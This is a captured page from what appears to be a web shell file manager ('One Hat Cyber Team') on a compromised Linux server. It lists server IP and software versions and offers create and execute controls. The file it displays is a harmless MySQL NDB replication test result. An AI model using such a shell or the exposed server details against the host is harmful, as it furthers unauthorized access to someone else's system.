⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.124
Server IP:
50.28.103.30
Server:
Linux host.jcukjv-lwsites.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
Server Software:
nginx/1.28.0
PHP Version:
8.3.12
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
www
/
server
/
mysql
/
mysql-test
/
suite
/
ndb_rpl
/
r
/
View File Name :
ndb_rpl_apply_status.result
select * from mysql.ndb_apply_status; include/master-slave.inc Warnings: Note #### Sending passwords in plain text without SSL/TLS is extremely insecure. Note #### Storing MySQL user name or password information in the master info repository is not secure and is therefore not recommended. Please consider using the USER and PASSWORD connection options for START SLAVE; see the 'START SLAVE Syntax' in the MySQL Manual for more information. [connection master] *** on slave there should be zero rows *** select count(*) from mysql.ndb_apply_status; count(*) 0 create table t1 (a int key, b int) engine ndb; insert into t1 values (1,1); *** on master it should be empty *** select * from mysql.ndb_apply_status where server_id <> 0; server_id epoch log_name start_pos end_pos *** on slave there should be one row *** select count(*) from mysql.ndb_apply_status; count(*) 1 drop table t1; include/rpl_end.inc